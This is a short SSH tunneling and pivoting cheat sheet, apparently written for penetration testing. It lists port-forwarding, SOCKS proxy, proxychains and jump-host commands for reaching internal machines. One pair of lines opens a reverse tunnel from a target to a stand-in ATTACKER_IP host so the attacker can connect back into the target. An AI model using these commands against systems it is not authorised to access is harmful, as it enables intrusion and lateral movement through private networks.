SSH Tunneling

ssh -L LOCAL_PORT:TARGET_IP:TARGET_PORT user@PIVOT_HOST

ssh -L 8080:10.10.10.5:80 user@pivot
# Access http://127.0.0.1:8080 → reaches 10.10.10.5:80

ssh -L 3306:10.10.10.5:3306 user@pivot
# mysql -h 127.0.0.1 -u root

ssh -R REMOTE_PORT:LOCAL_IP:LOCAL_PORT user@PIVOT_HOST

ssh -R 8888:127.0.0.1:80 user@pivot
# pivot:8888 → reaches attacker's port 80

ssh -D 1080 user@PIVOT_HOST

# /etc/proxychains4.conf
socks5 127.0.0.1 1080

proxychains nmap -sT -p 80,445 INTERNAL_TARGET
proxychains curl http://INTERNAL_TARGET

ssh -f -N -L 8080:10.10.10.5:80 user@pivot     # Background, no shell
ssh -f -N -D 1080 user@pivot                     # Background SOCKS

# ~/.ssh/config
Host pivot
    HostName 10.10.10.1
    User user
    IdentityFile ~/.ssh/id_rsa
    DynamicForward 1080

Host internal
    HostName 10.10.10.5
    User admin
    ProxyJump pivot

ssh internal                         # Auto-jumps through pivot

ssh -J user@pivot user@INTERNAL_TARGET
ssh -J user@hop1,user@hop2 user@FINAL_TARGET

# On target
ssh -R 9999:127.0.0.1:22 attacker@ATTACKER_IP

# On attacker
ssh -p 9999 [email protected]

ps aux | grep ssh
kill PID

ssh -M -S /tmp/tunnel -f -N -D 1080 user@pivot
ssh -S /tmp/tunnel -O exit user@pivot